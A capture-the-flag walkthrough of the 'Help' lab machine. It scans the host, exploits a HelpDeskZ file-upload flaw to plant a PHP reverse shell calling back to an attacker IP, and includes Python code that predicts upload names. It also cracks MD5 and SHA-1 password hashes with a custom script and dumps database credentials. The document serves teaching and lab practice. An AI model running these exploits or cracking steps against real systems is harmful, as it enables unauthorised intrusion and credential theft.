Help
Port scan
u505@kali:~/HTB/Machines/Help$ sudo masscan -e tun0 -p1-65535,U:1-65535 10.10.10.121 --rate=1000
[sudo] password for u505:

Starting masscan 1.0.5 at 2020-02-17 20:07:44 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.10.10.121
Discovered open port 3000/tcp on 10.10.10.121
Discovered open port 80/tcp on 10.10.10.121
u505@kali:~/HTB/Machines/Help$ nmap -sC -sV 10.10.10.121
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-17 15:07 EST
Nmap scan report for help.htb (10.10.10.121)
Host is up (0.038s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
|   256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_  256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.05 seconds

Three services: SSH, Apache on port 80 serving the default page, and a Node.js/Express application on port 3000 answering with JSON.
Web enumeration
u505@kali:~/HTB/Machines/Help$ python3 /opt/utils/dirsearch/dirsearch.py /usr/share/wordlists/dirb/common2.txt -e "txt" -f -t 50 -u http://help.htb

  _|. _ _  _  _  _ _|_    v0.3.9
 (_||| _) (/_(_|| (_| )

Extensions: txt | HTTP method: get | Threads: 50 | Wordlist size: 10313

Error Log: /opt/utils/dirsearch/logs/errors-20-02-17_15-11-25.log

Target: http://help.htb

[15:11:25] Starting: 
[15:11:26] 403 - 298B - /.ht_wsr.txt.txt
[15:11:26] 403 - 295B - /.ht_wsr.txt/
[15:11:26] 403 - 291B - /.hta.txt
[15:11:26] 403 - 288B - /.hta/
[15:11:26] 403 - 296B - /.htaccess.txt
[15:11:26] 403 - 300B - /.htaccess-dev.txt
[15:11:26] 403 - 297B - /.htaccess-dev/
[15:11:26] 403 - 302B - /.htaccess-local.txt
[15:11:26] 403 - 299B - /.htaccess-local/
[15:11:26] 403 - 302B - /.htaccess-marco.txt
[15:11:26] 403 - 299B - /.htaccess-marco/
[15:11:26] 403 - 300B - /.htaccess.BAK.txt
[15:11:26] 403 - 297B - /.htaccess.BAK/
[15:11:26] 403 - 300B - /.htaccess.bak.txt
[15:11:26] 403 - 297B - /.htaccess.bak/
[15:11:26] 403 - 301B - /.htaccess.bak1.txt
[15:11:26] 403 - 298B - /.htaccess.bak1/
[15:11:26] 403 - 300B - /.htaccess.inc.txt
[15:11:26] 403 - 297B - /.htaccess.inc/
[15:11:26] 403 - 297B - /.htaccess.old/
[15:11:26] 403 - 300B - /.htaccess.old.txt
[15:11:26] 403 - 301B - /.htaccess.orig.txt
[15:11:26] 403 - 298B - /.htaccess.orig/
[15:11:26] 403 - 303B - /.htaccess.sample.txt
[15:11:26] 403 - 300B - /.htaccess.sample/
[15:11:26] 403 - 301B - /.htaccess.save.txt
[15:11:26] 403 - 298B - /.htaccess.save/
[15:11:26] 403 - 300B - /.htaccess.txt.txt
[15:11:26] 403 - 297B - /.htaccess.txt/
[15:11:26] 403 - 302B - /.htaccess_extra.txt
[15:11:26] 403 - 299B - /.htaccess_extra/
[15:11:26] 403 - 301B - /.htaccess_orig.txt
[15:11:26] 403 - 298B - /.htaccess_orig/
[15:11:26] 403 - 299B - /.htaccess_sc.txt
[15:11:26] 403 - 296B - /.htaccess_sc/
[15:11:26] 403 - 299B - /.htaccessBAK.txt
[15:11:26] 403 - 296B - /.htaccessBAK/
[15:11:26] 403 - 299B - /.htaccessOLD.txt
[15:11:26] 403 - 296B - /.htaccessOLD/
[15:11:26] 403 - 300B - /.htaccessOLD2.txt
[15:11:26] 403 - 297B - /.htaccessOLD2/
[15:11:26] 403 - 297B - /.htaccess~.txt
[15:11:26] 403 - 294B - /.htaccess~/
[15:11:26] 403 - 295B - /.htgroup.txt
[15:11:26] 403 - 292B - /.htgroup/
[15:11:26] 403 - 296B - /.htpasswd.txt
[15:11:26] 403 - 300B - /.htpasswd-old.txt
[15:11:26] 403 - 297B - /.htpasswd-old/
[15:11:26] 403 - 300B - /.htpasswd.bak.txt
[15:11:26] 403 - 297B - /.htpasswd.bak/
[15:11:26] 403 - 300B - /.htpasswd.inc.txt
[15:11:26] 403 - 297B - /.htpasswd.inc/
[15:11:26] 403 - 301B - /.htpasswd_test.txt
[15:11:26] 403 - 297B - /.htpasswds.txt
[15:11:26] 403 - 298B - /.htpasswd_test/
[15:11:27] 403 - 294B - /.htpasswds/
[15:11:27] 403 - 297B - /.htpasswrd.txt
[15:11:27] 403 - 294B - /.htpasswrd/
[15:11:27] 403 - 295B - /.htusers.txt
[15:11:27] 403 - 292B - /.htusers/
[15:11:44] 403 - 289B - /icons/
[15:11:45] 403 - 294B - /javascript/
[15:11:52] 403 - 297B - /server-status/
[15:11:54] 200 - 4KB  - /support/

Task Completed
/support/ is the only real hit. We run dirsearch against that folder, adding php to the extensions since it is a PHP application.
u505@kali:~/HTB/Machines/Help$ python3 /opt/utils/dirsearch/dirsearch.py /usr/share/wordlists/dirb/common2.txt -e "txt,php" -f -t 50 -u http://help.htb/support/

  _|. _ _  _  _  _ _|_    v0.3.9
 (_||| _) (/_(_|| (_| )

Extensions: txt, php | HTTP method: get | Threads: 50 | Wordlist size: 15266

Error Log: /opt/utils/dirsearch/logs/errors-20-02-17_15-16-59.log

Target: http://help.htb/support/

[15:16:59] Starting: 
[15:17:01] 403 - 306B - /support/.ht_wsr.txt.txt
[15:17:01] 403 - 306B - /support/.ht_wsr.txt.php
[15:17:01] 403 - 303B - /support/.ht_wsr.txt/
[15:17:01] 403 - 299B - /support/.hta.txt
[15:17:02] 403 - 299B - /support/.hta.php
[15:17:02] 403 - 304B - /support/.htaccess.txt
[15:17:02] 403 - 296B - /support/.hta/
[15:17:02] 403 - 304B - /support/.htaccess.php
[15:17:02] 403 - 308B - /support/.htaccess-dev.txt
[15:17:02] 403 - 308B - /support/.htaccess-dev.php
[15:17:02] 403 - 305B - /support/.htaccess-dev/
[15:17:02] 403 - 307B - /support/.htaccess-local/
[15:17:02] 403 - 310B - /support/.htaccess-local.php
[15:17:02] 403 - 310B - /support/.htaccess-local.txt
[15:17:02] 403 - 310B - /support/.htaccess-marco.txt
[15:17:02] 403 - 310B - /support/.htaccess-marco.php
[15:17:02] 403 - 307B - /support/.htaccess-marco/
[15:17:02] 403 - 308B - /support/.htaccess.BAK.txt
[15:17:02] 403 - 308B - /support/.htaccess.BAK.php
[15:17:02] 403 - 305B - /support/.htaccess.BAK/
[15:17:02] 403 - 308B - /support/.htaccess.bak.txt
[15:17:02] 403 - 308B - /support/.htaccess.bak.php
[15:17:02] 403 - 305B - /support/.htaccess.bak/
[15:17:02] 403 - 309B - /support/.htaccess.bak1.txt
[15:17:02] 403 - 309B - /support/.htaccess.bak1.php
[15:17:02] 403 - 306B - /support/.htaccess.bak1/
[15:17:02] 403 - 308B - /support/.htaccess.inc.txt
[15:17:02] 403 - 308B - /support/.htaccess.inc.php
[15:17:02] 403 - 305B - /support/.htaccess.inc/
[15:17:02] 403 - 308B - /support/.htaccess.old.txt
[15:17:02] 403 - 308B - /support/.htaccess.old.php
[15:17:02] 403 - 305B - /support/.htaccess.old/
[15:17:02] 403 - 309B - /support/.htaccess.orig.txt
[15:17:02] 403 - 309B - /support/.htaccess.orig.php
[15:17:02] 403 - 306B - /support/.htaccess.orig/
[15:17:02] 403 - 311B - /support/.htaccess.sample.txt
[15:17:02] 403 - 311B - /support/.htaccess.sample.php
[15:17:02] 403 - 308B - /support/.htaccess.sample/
[15:17:02] 403 - 309B - /support/.htaccess.save.txt
[15:17:02] 403 - 309B - /support/.htaccess.save.php
[15:17:02] 403 - 306B - /support/.htaccess.save/
[15:17:02] 403 - 308B - /support/.htaccess.txt.txt
[15:17:02] 403 - 308B - /support/.htaccess.txt.php
[15:17:02] 403 - 305B - /support/.htaccess.txt/
[15:17:02] 403 - 310B - /support/.htaccess_extra.txt
[15:17:02] 403 - 310B - /support/.htaccess_extra.php
[15:17:02] 403 - 307B - /support/.htaccess_extra/
[15:17:02] 403 - 309B - /support/.htaccess_orig.txt
[15:17:02] 403 - 309B - /support/.htaccess_orig.php
[15:17:02] 403 - 306B - /support/.htaccess_orig/
[15:17:02] 403 - 307B - /support/.htaccess_sc.txt
[15:17:02] 403 - 307B - /support/.htaccess_sc.php
[15:17:02] 403 - 304B - /support/.htaccess_sc/
[15:17:02] 403 - 307B - /support/.htaccessBAK.txt
[15:17:02] 403 - 307B - /support/.htaccessBAK.php
[15:17:02] 403 - 304B - /support/.htaccessBAK/
[15:17:02] 403 - 307B - /support/.htaccessOLD.txt
[15:17:02] 403 - 307B - /support/.htaccessOLD.php
[15:17:02] 403 - 304B - /support/.htaccessOLD/
[15:17:02] 403 - 308B - /support/.htaccessOLD2.txt
[15:17:02] 403 - 308B - /support/.htaccessOLD2.php
[15:17:02] 403 - 305B - /support/.htaccessOLD2/
[15:17:02] 403 - 305B - /support/.htaccess~.txt
[15:17:02] 403 - 305B - /support/.htaccess~.php
[15:17:02] 403 - 302B - /support/.htaccess~/
[15:17:02] 403 - 303B - /support/.htgroup.txt
[15:17:02] 403 - 300B - /support/.htgroup/
[15:17:02] 403 - 303B - /support/.htgroup.php
[15:17:02] 403 - 304B - /support/.htpasswd.txt
[15:17:02] 403 - 304B - /support/.htpasswd.php
[15:17:02] 403 - 308B - /support/.htpasswd-old.txt
[15:17:02] 403 - 308B - /support/.htpasswd-old.php
[15:17:02] 403 - 305B - /support/.htpasswd-old/
[15:17:02] 403 - 308B - /support/.htpasswd.bak.txt
[15:17:02] 403 - 308B - /support/.htpasswd.bak.php
[15:17:02] 403 - 305B - /support/.htpasswd.bak/
[15:17:02] 403 - 308B - /support/.htpasswd.inc.txt
[15:17:02] 403 - 308B - /support/.htpasswd.inc.php
[15:17:02] 403 - 305B - /support/.htpasswd.inc/
[15:17:02] 403 - 309B - /support/.htpasswd_test.txt
[15:17:02] 403 - 309B - /support/.htpasswd_test.php
[15:17:02] 403 - 306B - /support/.htpasswd_test/
[15:17:02] 403 - 305B - /support/.htpasswds.txt
[15:17:02] 403 - 305B - /support/.htpasswds.php
[15:17:02] 403 - 302B - /support/.htpasswds/
[15:17:02] 403 - 305B - /support/.htpasswrd.txt
[15:17:02] 403 - 305B - /support/.htpasswrd.php
[15:17:02] 403 - 302B - /support/.htpasswrd/
[15:17:02] 403 - 303B - /support/.htusers.txt
[15:17:02] 403 - 303B - /support/.htusers.php
[15:17:02] 403 - 300B - /support/.htusers/
[15:17:25] 200 - 0B   - /support/css/
[15:17:33] 200 - 0B   - /support/images/
[15:17:33] 302 - 0B   - /support/includes/  ->  /
[15:17:33] 200 - 4KB  - /support/index.php
[15:17:34] 200 - 4KB  - /support/index.php/
[15:17:34] 200 - 4KB  - /support/index.php/login/
[15:17:35] 302 - 0B   - /support/js/  ->  /
[15:17:35] 302 - 0B   - /support/js/tinymce/  ->  /
[15:17:36] 200 - 18KB - /support/LICENSE.txt
[15:17:53] 302 - 0B   - /support/uploads/  ->  /

Task Completed

The /support/ folder hosts a HelpDeskZ installation. Note /support/uploads/: its index redirects to /, but that only hides the listing; a file inside it is still served if its name is known.
HelpDeskZ vulnerability
u505@kali:~/HTB/Machines/Help$ searchsploit helpdeskz
---------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                  |  Path
                                                                | (/usr/share/exploitdb/)
---------------------------------------------------------------- ----------------------------------------
HelpDeskZ 1.0.2 - Arbitrary File Upload                        | exploits/php/webapps/40300.py
HelpDeskZ < 1.0.2 - (Authenticated) SQL Injection / Unauthorize | exploits/php/webapps/41200.py
---------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
u505@kali:~/HTB/Machines/Help$ searchsploit -m 40300
  Exploit: HelpDeskZ 1.0.2 - Arbitrary File Upload
      URL: https://www.exploit-db.com/exploits/40300
     Path: /usr/share/exploitdb/exploits/php/webapps/40300.py
File Type: troff or preprocessor input, ASCII text, with CRLF line terminators

Copied to: /home/u505/HTB/Machines/Help/40300.py
Download the source code
The application is open source, so we can read the upload code the exploit relies on.

u505@kali:~/HTB/Machines/Help/helpdeskzcode$ wget https://github.com/evolutionscript/HelpDeskZ-1.0/archive/master.zip
u505@kali:~/HTB/Machines/Help/helpdeskzcode$ unzip master.zip
Reading the controller the exploit targets shows how the attachment name is built: the md5 of the original filename concatenated with time(), the server's Unix timestamp in seconds, followed by the original extension. The file is moved into uploads/tickets/ first and verified only afterwards; when the extension is not allowed, the code merely sets an error message and never removes the file that is already on disk. The fix is the obvious reordering (verify before move_uploaded_file, or unlink on failure), together with an uploads directory from which Apache does not execute PHP.
u505@kali:~/HTB/Machines/Help/helpdeskzcode/HelpDeskZ-1.0-master$ vi +39 controllers/view_tickets_controller.php

if($settings['ticket_attachment'] == 1){
    $uploaddir = UPLOAD_DIR.'tickets/';
    if($_FILES['attachment']['error'] == 0){
        // Stored name: md5(<original name><unix time>) plus the original extension.
        $ext = pathinfo($_FILES['attachment']['name'], PATHINFO_EXTENSION);
        $filename = md5($_FILES['attachment']['name'].time()).".".$ext;
        $fileuploaded = array('name' => $_FILES['attachment']['name'], 'enc' => $filename, 'size' => formatBytes($_FILES['attachment']['size']), 'filetype' => $_FILES['attachment']['type']);
        $uploadedfile = $uploaddir.$filename;
        // The file lands on disk here, before any verification.
        if (!move_uploaded_file($_FILES['attachment']['tmp_name'], $uploadedfile)) {
            $show_error = true;
            $error_msg = $LANG['ERROR_UPLOADING_A_FILE'];
        }else{
            // Verification happens after the move; every failure branch only
            // sets an error message and leaves the uploaded file in place.
            $fileverification = verifyAttachment($_FILES['attachment']);
            switch($fileverification['msg_code']){
                case '1':
                    $show_error = true;
                    $error_msg = $LANG['INVALID_FILE_EXTENSION'];
                    break;
                case '2':
                    $show_error = true;
                    $error_msg = $LANG['FILE_NOT_ALLOWED'];
                    break;
                case '3':
                    $show_error = true;
                    $error_msg = str_replace("%size%", $fileverification['msg_extra'], $LANG['FILE_IS_BIG']);
                    break;
            }
        }
    }
}
The exploit therefore consists of uploading a PHP reverse shell through the normal attachment form, then "guessing" the stored name: it recomputes md5(filename + timestamp) for a window of timestamps around the upload time and requests each candidate until one answers 200.
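The name guessing described above, as an added example written for this page (it is not exploit-db 40300, the exploit.py run below, or HelpDeskZ code). It reproduces the md5($name.time()).".".$ext naming from the controller, walks the candidate timestamps backwards from the server's clock, and probes each URL through a caller-supplied probe function. The helper names, the base URL and the idea of reading the server's clock from the HTTP Date header are this example's own choices, not something the page describes.

```python
#!/usr/bin/env python3
"""Predict the stored name of a HelpDeskZ ticket attachment (added example).

HelpDeskZ saves an attachment as md5(<original name> . time()) . "." . <ext>,
with time() the *server's* Unix timestamp in seconds, and leaves the file in
place even when the extension check then fails. Knowing the name we uploaded
and the server's clock, the stored name is a small search.
"""
import hashlib
from email.utils import parsedate_to_datetime
from typing import Callable, Iterator, Optional


def stored_name(original_name: str, unix_time: int) -> str:
    """Mirror PHP's md5($name.time()).".".pathinfo($name, PATHINFO_EXTENSION)."""
    ext = original_name.rsplit(".", 1)[1] if "." in original_name else ""
    digest = hashlib.md5((original_name + str(unix_time)).encode()).hexdigest()
    return f"{digest}.{ext}"          # PHP appends the dot even for an empty ext


def candidate_names(original_name: str, server_time: int, window: int = 300) -> Iterator[str]:
    """Yield names for server_time, server_time-1, ... server_time-window.

    The upload happened shortly *before* we start probing, so the search walks
    backwards from the server's current clock.
    """
    for delta in range(window + 1):
        yield stored_name(original_name, server_time - delta)


def server_time_from_date_header(date_header: str) -> int:
    """Unix time taken from an HTTP Date header such as 'Mon, 17 Feb 2020 20:07:44 GMT'.

    md5() is fed the target's time(), not ours; if the two clocks are skewed the
    window around our local clock never matches. Any response from the target
    carries its clock in the Date header, so seed the search from that.
    """
    return int(parsedate_to_datetime(date_header).timestamp())


def find_uploaded_file(base_url: str, original_name: str, server_time: int,
                       probe: Callable[[str], int], window: int = 300) -> Optional[str]:
    """Return the first candidate URL for which probe(url) reports HTTP 200.

    `probe` is injected (e.g. lambda u: requests.head(u).status_code) so the
    search logic can be exercised offline. Any request to the right name, HEAD
    included, executes the uploaded PHP: with a reverse shell the probe of the
    winning URL blocks until that shell exits.
    """
    base = base_url.rstrip("/") + "/"
    for name in candidate_names(original_name, server_time, window):
        url = base + name
        if probe(url) == 200:
            return url
    return None


if __name__ == "__main__":
    # Offline demo with a constructed target: pretend the server stored an
    # upload of "php-reverse-shell.php" 42 seconds before the Date header below.
    date_header = "Mon, 17 Feb 2020 20:07:44 GMT"      # constructed sample
    now = server_time_from_date_header(date_header)
    secret = stored_name("php-reverse-shell.php", now - 42)

    def fake_probe(url: str) -> int:                   # stands in for requests.head
        return 200 if url.endswith("/" + secret) else 404

    hit = find_uploaded_file("http://10.10.10.121/support/uploads/tickets/",
                             "php-reverse-shell.php", now, fake_probe)
    print("found:", hit)
```

Two points worth keeping in mind when running something like this for real: time() is evaluated on the target, so seed the search from the target's own Date header rather than your local clock whenever the two may be skewed; and because every request to the correct name executes the uploaded PHP, a reverse shell makes the winning probe hang until the shell exits, which is exactly the stall seen in the run on this page.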
Prepare the reverse shell
u505@kali:~/HTB/Machines/Help$ cp /usr/share/webshells/php/php-reverse-shell.php ./
u505@kali:~/HTB/Machines/Help$ vi php-reverse-shell.php
u505@kali:~/HTB/Machines/Help$ grep CHANGE php-reverse-shell.php
$ip = '10.10.14.26';  // CHANGE THIS
$port = 4444;       // CHANGE THIS

We start the listener:

u505@kali:~/HTB/Machines/Help$ rlwrap nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Upload the reverse shell as a ticket attachment through the HelpDeskZ interface under /support/. The application answers with an invalid-extension error but, as the controller code shows, the file is already in uploads/tickets/ under its md5 name.

Run the exploit (the copied 40300.py, saved here as exploit.py) to find the URL:

u505@kali:~/HTB/Machines/Help$ python exploit.py http://10.10.10.121/support/uploads/tickets/ php-reverse-shell.php
Helpdeskz v1.0.2 - Unauthenticated shell upload exploit

The exploit appears to stall, but a reverse shell has been opened: the request that hits the right name executes the uploaded PHP, and that request does not return until the reverse shell exits.

u505@kali:~/HTB/Machines/Help$ rlwrap nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.121.
Ncat: Connection from 10.10.10.121:55930.
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 13:02:24 up  1:15,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
/bin/sh: 0: can't access tty; job control turned off
$ exit

Leaving the reverse shell lets the hung request complete, and the exploit then prints the URL, so the shell can be re-triggered later without guessing again. Note that the shell runs as uid 1000 (help) rather than www-data: the web server runs under that user's account, so the user flag is within reach directly.

u505@kali:~/HTB/Machines/Help$ python exploit.py http://10.10.10.121/support/uploads/tickets/ php-reverse-shell.php
Helpdeskz v1.0.2 - Unauthenticated shell upload exploit
found!
http://10.10.10.121/support/uploads/tickets/b76aa37ba0ec2d78e6b48dc121693d47.php
User flag
u505@kali:~/HTB/Machines/Help$ rlwrap nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

We trigger the reverse shell again by requesting the uploaded file directly:

u505@kali:~/HTB/Machines/Help$ curl http://10.10.10.121/support/uploads/tickets/b76aa37ba0ec2d78e6b48dc121693d47.php

On the listener, we upgrade to a proper tty and read the flag:

u505@kali:~/HTB/Machines/Help$ rlwrap nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.121.
Ncat: Connection from 10.10.10.121:55932.
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 13:07:24 up  1:20,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty;pty.spawn('/bin/bash')"
help@help:/$ stty raw -echo
help@help:/$ cat /home/help/user.txt
<USER_FLAG>
User recon
help@help:/home/help$ cat .bash_history
sudo mkdir lol
ls -la
cat .bash_history
rm -rf .bash_history
touch .bash_history
ls -la
su
su rOOTmEoRdIE
su MS' exit / al ; ` \ '
su
cd help
cd /help
cd src
ls
cd graphql
ls
cd schema/
ls
cd resolvers/
ls
cat index.js
cd
cd help
ls
npm run build
reboot
sudo shutdown

The history leaks a password-like string typed at an su prompt (rOOTmEoRdIE) and points to the GraphQL resolvers of the Node.js application under /home/help/help, presumably the Express service seen on port 3000.
File /home/help/help/src/graphql/schema/resolvers/index.js
help@help:/home/help/help$ cat src/graphql/schema/resolvers/index.js
const user = { username:'helpme@helpme.com', password:'5d3c93182bb20f07b994a7f617e99cff' }
const resolvers = {
Query: {
user () {
return user
}
}
}
The hash is 32 hex characters, i.e. an unsalted MD5 (hashcat mode 0). We run it against rockyou:
u505@kali:~/HTB/Machines/Help$ cat hash.txt
5d3c93182bb20f07b994a7f617e99cff
u505@kali:~/HTB/Machines/Help$ hashcat -m 0 hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
u505@kali:~/HTB/Machines/Help$ hashcat -m 0 hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show
5d3c93182bb20f07b994a7f617e99cff:godhelpmeplz
Database
help@help:/var/www/html/support/includes$ cat config.php
<?php
$config['Database']['dbname'] = 'support';
$config['Database']['tableprefix'] = '';
$config['Database']['servername'] = 'localhost';
$config['Database']['username'] = 'root';
$config['Database']['password'] = 'helpme';
$config['Database']['type'] = 'mysqli';
?>

As is all too common, the web application connects to the database as root, with a trivial password. A compromise of the web application therefore exposes every database on the server; a dedicated account limited to the support schema would have contained the damage.
help@help:/var/www/html/support/includes$ mysql -p -u root
Enter password: helpme

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 20
Server version: 5.7.24-0ubuntu0.16.04.1 (Ubuntu)

Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| support            |
| sys                |
+--------------------+
5 rows in set (0.00 sec)

mysql> use support
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> select * from users;
+----+------------+----------+-----------------------+------------------------------------------+------------------+--------+
| id | salutation | fullname | email                 | password                                 | timezone         | status |
+----+------------+----------+-----------------------+------------------------------------------+------------------+--------+
|  1 |          0 | helpme   | helpme@helpme.com     | c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca | Indian/Christmas |      1 |
|  2 |          0 | xcvxv    | lolololol@yopmail.com | ec09fa0d0ba74336ea7fe392869adb198242f15a | NULL             |      1 |
+----+------------+----------+-----------------------+------------------------------------------+------------------+--------+
2 rows in set (0.00 sec)

mysql> select * from staff\G
*************************** 1. row ***************************
                    id: 1
              username: admin
              password: d318f44739dced66793b1a603028133a76ae680e
              fullname: Administrator
                 email: support@mysite.com
                 login: 1547216217
            last_login: 1543429746
            department: a:1:{i:0;s:1:"1";}
              timezone: 
             signature: Best regards,
Administrator
newticket_notification: 0
                avatar: NULL
                 admin: 1
                status: Enable
1 row in set (0.00 sec)
These hashes are 40 hex characters, i.e. unsalted SHA-1 (hashcat mode 100). HelpDeskZ stores its user and staff passwords this way, so anyone holding a copy of these tables is one wordlist run away from the plaintexts:
u505@kali:~/HTB/Machines/Help$ cat hash2.txt
ec09fa0d0ba74336ea7fe392869adb198242f15a
c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca
d318f44739dced66793b1a603028133a76ae680e
u505@kali:~/HTB/Machines/Help$ hashcat -m 100 hash2.txt hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
u505@kali:~/HTB/Machines/Help$ hashcat -m 100 hash2.txt hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show
d318f44739dced66793b1a603028133a76ae680e:Welcome1
c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca:godhelpmeplz
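The same cracking step in Python, as an added example that serves both the MD5 from index.js and the SHA-1 hashes from the support database (it is not hashcat and not code from the page). The hash type is inferred from the digest length, each wordlist entry is digested once per algorithm rather than once per hash, and a final pass reports any password that recovers more than one hash, which is how the reuse between the GraphQL user and the helpme@helpme.com account shows up. The five-word wordlist standing in for rockyou.txt is constructed for the demo; the hashes are the ones shown on this page.

```python
#!/usr/bin/env python3
"""Wordlist attack on unsalted MD5 / SHA-1 digests (added example, not hashcat).

Equivalent to the `hashcat -m 0` and `hashcat -m 100` runs on this page, with a
reuse report on top: the same password behind several hashes is the finding
that matters most in a writeup like this one.
"""
import hashlib
from typing import Dict, Iterable, List, Optional, Set, Tuple

# Unsalted hex digests are identified by length alone; the second element is
# the matching hashcat mode, kept only for cross-reference with the page.
DIGEST_BY_LENGTH: Dict[int, Tuple[str, int]] = {32: ("md5", 0), 40: ("sha1", 100)}


def identify(hexhash: str) -> Optional[Tuple[str, int]]:
    """Return (hashlib name, hashcat mode) for a bare hex digest, else None."""
    h = hexhash.strip().lower()
    if not h or any(c not in "0123456789abcdef" for c in h):
        return None
    return DIGEST_BY_LENGTH.get(len(h))


def crack(hashes: Iterable[str], wordlist: Iterable[str]) -> Dict[str, str]:
    """Map each recovered digest to its plaintext.

    Targets are bucketed by algorithm so every candidate word is digested once
    per algorithm in use, not once per target hash; the loop stops early once
    every target is recovered.
    """
    pending: Dict[str, Set[str]] = {}
    for h in hashes:
        algo = identify(h)
        if algo is None:
            continue                        # not a bare md5/sha1 digest; skip it
        pending.setdefault(algo[0], set()).add(h.strip().lower())

    found: Dict[str, str] = {}
    for word in wordlist:
        word = word.rstrip("\r\n")
        data = word.encode("utf-8")
        for algo, targets in pending.items():
            if not targets:
                continue
            d = hashlib.new(algo, data).hexdigest()
            if d in targets:
                found[d] = word
                targets.discard(d)
        if not any(pending.values()):
            break
    return found


def reuse_report(found: Dict[str, str]) -> Dict[str, List[str]]:
    """Passwords that unlock more than one hash, with the hashes they cover."""
    by_password: Dict[str, List[str]] = {}
    for digest, word in found.items():
        by_password.setdefault(word, []).append(digest)
    return {w: sorted(ds) for w, ds in by_password.items() if len(ds) > 1}


# Hashes from this page: the MD5 in index.js, then the SHA-1s from the
# support.users and support.staff tables.
PAGE_HASHES = [
    "5d3c93182bb20f07b994a7f617e99cff",
    "c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca",
    "ec09fa0d0ba74336ea7fe392869adb198242f15a",
    "d318f44739dced66793b1a603028133a76ae680e",
]
# Constructed stand-in for rockyou.txt.
DEMO_WORDLIST = ["123456", "password", "godhelpmeplz", "Welcome1", "letmein"]


def run_demo() -> Tuple[Dict[str, str], Dict[str, List[str]]]:
    """Crack the page's hashes with the demo wordlist and report reuse."""
    found = crack(PAGE_HASHES, DEMO_WORDLIST)
    return found, reuse_report(found)


if __name__ == "__main__":
    found, reused = run_demo()
    for digest, word in found.items():
        print(f"{digest}:{word}")
    for word, digests in reused.items():
        print(f"password {word!r} reused across {len(digests)} hashes")
```

Point the wordlist argument at an open file object to run it against rockyou.txt for real; the early exit means a run against a handful of hashes stops as soon as the last one falls rather than walking the whole list.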
After a few tries, Welcome1 turns out to be the password of the local user help as well: the HelpDeskZ admin password is reused for the system account.

u505@kali:~/HTB/Machines/Help$ ssh help@help
The authenticity of host 'help (10.10.10.121)' can't be established.
ECDSA key fingerprint is SHA256:hObUCDbNmiPilZ/0rchuxdSfRB7uSKrmk/4TjE5nCnk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'help,10.10.10.121' (ECDSA) to the list of known hosts.
help@help's password: 
Welcome to Ubuntu 16.04.5 LTS (GNU/Linux 4.4.0-116-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
You have new mail.
Last login: Fri Jan 11 06:18:50 2019
help@help:~$ sudo -l
[sudo] password for help: 
Sorry, user help may not run sudo on help.

We now have help's password, but it buys nothing the reverse shell did not already give us: help cannot run sudo.
Privilege escalation
